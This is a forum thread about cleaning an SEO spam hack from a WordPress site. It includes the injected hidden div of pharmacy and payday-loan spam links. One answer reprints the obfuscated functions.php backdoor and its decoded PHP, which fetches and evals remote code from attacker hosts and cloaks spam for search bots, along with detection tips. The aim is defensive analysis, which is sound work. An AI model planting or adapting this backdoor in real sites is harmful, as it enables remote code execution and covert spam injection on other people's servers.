I’m working on a client’s site and I noticed that posts have a hidden <div> filled to SPAM links to dick pills, etc. Hoping to get lucky, I searched for some of the keywords in the database tables, but found no matches. I also searched the code in all the files, and also found no matches.
I know that WordPress hacks can be very tricky to remove, and they go to great lengths to make them hard to find. But perhaps there are some “usual suspects” that I could check, or maybe some tell-tale signs I could look for.
I’m not asking for anyone to solve this specific hack. I’m just looking for advice on where (in general) to look.
In case it’s useful, here’s the unauthorized <div> which is injected right before the close of the first <\p>:
<div id='hideMeya'> At that requires looking for how you http://www.cialis.com <a href="http://wwxcashadvancecom.com/" title="want $745? visit our site.">want $745? visit our site.</a> sign any of money. Visit our secure bad creditors that cialis levitra sales viagra <a href="http://www10525.c3viagra10.com/" title="viagra australia online">viagra australia online</a> payday lenders know otherwise. But the black you stay on discount price levitra <a href="http://www10385.x1cialis10.com/" title="what is impotence in men">what is impotence in men</a> duty to their lives. Citizen at one online or after receiving their research viagra online <a href="http://www10675.80viagra10.com/" title="www.viagra.com">www.viagra.com</a> to just take just wait until monday. This specifically relates to shop every pay stubs get viagra without prescription <a href="http://www10154.40cialis10.com/" title="cialis overnight delivery">cialis overnight delivery</a> and only used or faxing required. We will turn double checked by some small business loans viagra for woman <a href="http://www10077.x1cialis10.com/" title="cialis india">cialis india</a> sites that works the business before approval. Living paycheck went out cash there would generate levitra <a href="http://www10450.a1viagra10.com/" title="viagra cialis levitra">viagra cialis levitra</a> the scheduled maturity day method. Own a short application on when money also buy cialis online <a href="http://buy4kamagra.com/" title="kamagra">kamagra</a> plenty of personal initial limits. Even those loans quick because lenders realize http://cialis-ca-online.com <a href="http://levitra4au.com/" title="levitrafroaustraila">levitrafroaustraila</a> you notice a payday advance. A loan applications are more common thanks http://www.cialis2au.com/ <a href="http://buy-7cialis.com/" title="cialis">cialis</a> to only apply online website. Third borrowers will use your paycheck to levitra online pharmacy <a href="http://www10675.30viagra10.com/" title="viagra online purchase">viagra online purchase</a> utilize these individuals can cover. Often there must also referred to ensure online pharmacy viagra usa <a href="http://www10600.90viagra10.com/" title="viagra effectiveness">viagra effectiveness</a> you with financial expenses. Thanks to checking account also merchant cash loan wwwwviagracom.com <a href="http://www10075.90viagra10.com/" title="levitra viagra cialis">levitra viagra cialis</a> comparison to state or from there. At that they pay them in mere viagra <a href="http://www10225.30viagra10.com/" title="cheapest generic viagra">cheapest generic viagra</a> seconds and to comprehend. If a repossession or limited to see if approved www.cashadvances.com | Apply for a cash advance online! <a href="http://www10385.70cialis10.com/" title="cialis dosage">cialis dosage</a> the risks associated at your current address. Second borrowers should not start and struggle http://www.cashadvance.com <a href="http://levitra-online-ca.com/" title="levitra for sale">levitra for sale</a> at least a button. Thanks to send the benefits of everyday living cheapest viagra order online <a href="http://www10462.70cialis10.com/" title="tadalafil">tadalafil</a> from being foreclosed on its benefits. Finally you get help rebuild the original loan buy cialis viagra <a href="http://viagra5online.com/" title="viagra without prescription">viagra without prescription</a> can really only to surprises. Bank loans out you will take http://wviagracom.com/ <a href="http://www10539.40cialis10.com/" title="erectile dysfunction supplements">erectile dysfunction supplements</a> the conditions are a. Bills might provide an unexpected car cialis uk suppliers <a href="http://kamagra-ca-online.com/" title="kamagra">kamagra</a> broke a repayment length. Third borrowers repay because payday industry has the results http://www.buy9levitra.com/ <a href="http://www10075.20viagra10.com/" title="viagra recreational use">viagra recreational use</a> by the middle man and check process. After verifying your question with dignity and credit cards www.levitra.com <a href="http://www10300.b2viagra10.com/" title="overnight viagra delivery">overnight viagra delivery</a> or drive to secure loan online. Most people for dollars you between bad and free cialis <a href="http://viagra7au.com/" title="http://viagra7au.com/">http://viagra7au.com/</a> instead these applicants is available. Social security against your payday the larger sums buying viagra online <a href="http://payday7online.com/" title="direct lenders installment loans no credit check">direct lenders installment loans no credit check</a> of gossip when working telephone calls. Face it provides hour payday industry levitra online <a href="http://www10150.30viagra10.com/" title="buy viagra now">buy viagra now</a> has high credit score? Within minutes during your best score range from http://cashadvance8online.com <a href="http://www10450.60viagra10.com/" title="viagra dosage instructions">viagra dosage instructions</a> fees if there for them most. To avoid paperwork you in crisis arise from wwwpaydayloancom.com | Online Payday Loans application form! <a href="http://www10225.80viagra10.com/" title="super active viagra">super active viagra</a> online from paying the bank? Funds will know to throwing your cash advance no credit check <a href="http://orderviagrauaonline.com/" title="viagara online">viagara online</a> finances there that purse. Companies realize that asks for which can become cialis online <a href="http://www10375.60viagra10.com/" title="sublingual viagra">sublingual viagra</a> eligible to paycheck some lenders. Medical bills that be much easier than actually need only online cash advance <a href="http://cashadvance8online.com" title="online cash advance">online cash advance</a> your funds via the freedom you out. </div><script type="text/javascript">if(document.getElementById('hideMeya') != null){document.getElementById('hideMeya').style.visibility = 'hidden';document.getElementById('hideMeya').style.display = 'none';}</script> </p>
2 s
I won’t repeat any of the good advice in Squish’s answer. You should also read this article on WordPress security. I’m just going to cover the specifics of what I learned from my episode.
My attack is a kind of black hat SEO known as “hideMeYa”: http://siteolytics.com/black-hat-seo-technique-demystified/
Basically, the attacker slips a bunch of hidden links into the content so humans can’t see them but google can. So they use unsuspecting sites to drum up back links to shady sites.
It’s hard to say for sure how this was done, but in this site there were two known security vulnerabilities:
- admin user was still in use (you should delete/rename the admin user).
- Outdated plugins and core
In my case, the infected file was my theme’s functions.php file. At the very top was this:
<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))"=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"(edoced_46esab(lave'));?><?php
Notice how it’s cleverly named to look like typical WordPress stuff.
I’m not going to walk through all the code, but basically it’s a bunch of base64_encodeed code as a reversed string. The strrev() makes it hard to find the two biggest red flags here: base64_encode and eval. The un-obfuscated code is included below, but here are my biggest takeaways (in addition to what Squish said):
- Be on the look-out for
evalandbase64_decode, but also look for their reversed equivalents:laveandedoced_46esab - Also look for instances of
strrev. There are few legitimate uses of all of these in the WP core which will return false positives, but not so many that you can’t scrutinize each one. - In my case, the hack doesn’t appear for logged in users (It checks client’s cookies), so don’t let that throw you off. It’s a clever twist to confuse the users who are most likely to be looking for it.
Good night and good luck.
The un-obfuscated code turns out to be this:
function get_url_999($url){$content="";$content=@trycurl_999($url);if($content!==false)return $content;$content=@tryfile_999($url);if($content!==false)return $content;$content=@tryfopen_999($url);if($content!==false)return $content;$content=@tryfsockopen_999($url);if($content!==false)return $content;$content=@trysocket_999($url);if($content!==false)return $content;return '';}
function trycurl_999($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;}
function tryfile_999($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;}
function tryfopen_999($url){if(function_exists('fopen')===false)return false;$buf="";$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}
function tryfsockopen_999($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf="";while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function trysocket_999($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf="";while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function str_replace_first($search, $replace, $subject) {$pos = stripos($subject, $search);if ($pos !== false) { $subject = substr_replace($subject, $replace, $pos, strlen($search));} return $subject;}
function is_bot_ua(){$bot=0;$ua=@$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"googlebot"))$bot=1;return $bot;}
function is_googlebot_ip(){$k=0;$ip=sprintf("%u",@ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip>=1123631104)&&($ip<=1123639295))$k=1;return $k;}
function update_file_999(){
$uri="g.php?t=p&i=7dbdd7b4";
$actual1="http://nlinthewood.com/".$uri;
$actual2="http://maxigg.ru/".$uri;
$val=get_url_999($actual1);
if ($val=="")$val=get_url_999($actual2);
if (strstr($val,"|||CODE|||")){
list($val,$code)=explode("|||CODE|||",$val);
eval(base64_decode($code));
}
return $val;
}
function callback_function_php($p) {
if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) ) {
return $p;
}
$x='{options_names}';
$buf="";
$update=0;
if (!$k = get_option($x)){
if (!add_option($x,Array(),'','no')){
return $p;
}
$update=1;
}else{
$ctime=time()-@$k[1];
if ($ctime>3600*12){
$update=1;
}
}
if ($update){
$val=update_file_999();
$k=array();
$k[0]=$val;
$k[1]=time();
if (!update_option($x,$k)){
return $p;
}
}
if (!$k = get_option($x)){
return $p;
}
$buf=@$k[0];
if ($buf==""){
return $p;
}
list($type,$text)=@explode("|||",$buf);
if ($text=="")return $p;
$type+=0;
$bot=0;
if ($type==0){
$buf1=@base64_decode($text);
list($tagjs,$js,$tagtext1,$text1)=@explode("|||",$buf1);
if (($tagjs!="")&&(stristr($p,$tagjs))){
$p=str_replace_first($tagjs, $js." ".$tagjs, $p);
}else{
$p=$p.$js;
}
if (($tagtext1!="")&&(stristr($p,$tagtext1))){
$p=str_replace_first($tagtext1, $text1." ".$tagtext1, $p);
}else{
$p=$p.$text1;
}
}else
if (($type==1)||($type==2)||($type==3)||($type==4)){
if (($type==1)||($type==4)){
$bot=is_bot_ua();
}
if (($type==2)||($type==3)){
$bot=is_googlebot_ip();
}
if ($bot){
$buf1=@base64_decode($text);
list($tag,$text1)=@explode("|||",$buf1);
if (($tag!="")&&($text1!="")){
if (stristr($p,$tag)){
if (($type==3)||($type==4)){
$p=@str_ireplace($tag,$tag." ".$text1,$p);
}else{
$p=str_replace_first($tag, $tag." ".$text1, $p);
}
}else{
$p=$p.$text1;
}
}
}
}
return $p;
}
ob_start("callback_function_php");
